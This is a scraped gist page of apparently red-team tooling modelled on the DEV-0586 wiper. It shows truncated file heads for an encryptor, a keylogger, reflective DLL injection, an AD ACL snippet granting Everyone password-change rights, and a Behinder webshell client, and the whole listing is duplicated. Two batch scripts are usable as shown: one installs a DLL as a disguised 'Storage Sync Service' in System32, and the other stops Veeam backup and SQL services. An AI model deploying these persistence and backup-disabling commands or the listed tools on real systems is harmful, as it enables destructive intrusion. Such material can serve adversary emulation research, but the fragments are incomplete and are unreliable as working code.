2XXE (SRA) 2XXE-SRA

## coldencryptor.cs
using System;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Threading.Tasks;
using Microsoft.Win32;

public class Crypto

## enum.sh
#!/bin/bash
df -aH
ip addr
netstat -tulpn
ps -aux
who -a
systemctl list-units --type=service --no-pager
service --status-all
apt list --installed

## dockerssm.py
import json
import docker
import os
import boto3
import subprocess

TARGET_INSTANCE = "<instance ID>"
LOCAL_PORT = "9999"
REGION = "us-east-1"
PROFILE = "default"

## removeace.ps1
# get SID for "Everyone" principal
$sid = [Security.Principal.securityidentifier]::new([System.Security.Principal.WellKnownSidType]::WorldSid, $null)
$everyone = $sid.Translate([security.principal.ntaccount])

# change user password permissions
$adRight=[DirectoryServices.ActiveDirectoryRights]"ExtendedRight"
$pguid = new-object GUID "ab721a53-1e2f-11d0-9819-00aa0040529b"  # refer to https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1522b774-6464-41a3-87a5-1e5633c3fbbb

# craft an ACE that grants "Everyone" "Allow" for changing user password
$accessRuleArgs = $everyone,$adRight,"Allow",$pguid,"None"

## keylog.cs
using System;
using System.Diagnostics;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;

class InterceptKeys
{
    private const int WH_KEYBOARD_LL = 13;
    private const int WM_KEYDOWN = 0x0100;

## inject.cpp
//modified from: https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection

#include <iostream>
#include <windows.h>
#include "resource.h"

typedef struct BASE_RELOCATION_BLOCK {
	DWORD PageAddress;
	DWORD BlockSize;
} BASE_RELOCATION_BLOCK, * PBASE_RELOCATION_BLOCK;

## install.bat
@echo off
set "WORK_DIR=C:\Windows\System32"
set "DLL_NAME=storesyncsvc.dll"
set "SERVICE_NAME=StorSyncSvc"
set "DISPLAY_NAME=Storage Sync Service"
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."
sc stop %SERVICE_NAME%
sc delete %SERVICE_NAME%
mkdir %WORK_DIR%
copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y

## kill.bat
net1 stop samss /y
net1 stop veeamcatalogsvc /y
net1 stop veeamcloudsvc /y
net1 stop veeamdeploysvc /y
net.exe stop samss /y
net.exe stop veeamcatalogsvc /y
net.exe stop veeamcloudsvc /y
net.exe stop veeamdeploysvc /y
taskkill.exe /IM sqlbrowser.exe /F
taskkill.exe /IM sqlceip.exe /F

## php_cmd.py
# Behinder Webshell Clients

## php_cmd.py

Minimal client for Behinder PHP webshell (shell.php). Requires Cmd.php from the official client jar.

## README.md

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                2XXE-SRA
                / README.md
            
            
              Last active
              February 1, 2022 19:07
            
              
                File wiper (and other resources) based on DEV-0586 (MSTIC)
              
          
    Usage


.\wipe <directory>

will rewrite all files in a directory recursively
	using System;
	using System.IO;
	using System.Linq;
	using System.Security.Cryptography;
	using System.Collections.Generic;
	using System.Runtime.InteropServices;
	using System.Threading.Tasks;
	using Microsoft.Win32;

	public class Crypto
	#!/bin/bash
	df -aH
	ip addr
	netstat -tulpn
	ps -aux
	who -a
	systemctl list-units --type=service --no-pager
	service --status-all
	apt list --installed
	import json
	import docker
	import os
	import boto3
	import subprocess

	TARGET_INSTANCE = "<instance ID>"
	LOCAL_PORT = "9999"
	REGION = "us-east-1"
	PROFILE = "default"
	# get SID for "Everyone" principal
	$sid = [Security.Principal.securityidentifier]::new([System.Security.Principal.WellKnownSidType]::WorldSid, $null)
	$everyone = $sid.Translate([security.principal.ntaccount])

	# change user password permissions
	$adRight=[DirectoryServices.ActiveDirectoryRights]"ExtendedRight"
	$pguid = new-object GUID "ab721a53-1e2f-11d0-9819-00aa0040529b" # refer to https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1522b774-6464-41a3-87a5-1e5633c3fbbb

	# craft an ACE that grants "Everyone" "Allow" for changing user password
	$accessRuleArgs = $everyone,$adRight,"Allow",$pguid,"None"
	using System;
	using System.Diagnostics;
	using System.Windows.Forms;
	using System.Runtime.InteropServices;
	using System.IO;

	class InterceptKeys
	{
	private const int WH_KEYBOARD_LL = 13;
	private const int WM_KEYDOWN = 0x0100;
	//modified from: https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection

	#include <iostream>
	#include <windows.h>
	#include "resource.h"

	typedef struct BASE_RELOCATION_BLOCK {
	DWORD PageAddress;
	DWORD BlockSize;
	} BASE_RELOCATION_BLOCK, * PBASE_RELOCATION_BLOCK;
	@echo off
	set "WORK_DIR=C:\Windows\System32"
	set "DLL_NAME=storesyncsvc.dll"
	set "SERVICE_NAME=StorSyncSvc"
	set "DISPLAY_NAME=Storage Sync Service"
	set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."
	sc stop %SERVICE_NAME%
	sc delete %SERVICE_NAME%
	mkdir %WORK_DIR%
	copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y
	net1 stop samss /y
	net1 stop veeamcatalogsvc /y
	net1 stop veeamcloudsvc /y
	net1 stop veeamdeploysvc /y
	net.exe stop samss /y
	net.exe stop veeamcatalogsvc /y
	net.exe stop veeamcloudsvc /y
	net.exe stop veeamdeploysvc /y
	taskkill.exe /IM sqlbrowser.exe /F
	taskkill.exe /IM sqlceip.exe /F
	# Behinder Webshell Clients

	## php_cmd.py

	Minimal client for Behinder PHP webshell (shell.php). Requires Cmd.php from the official client jar.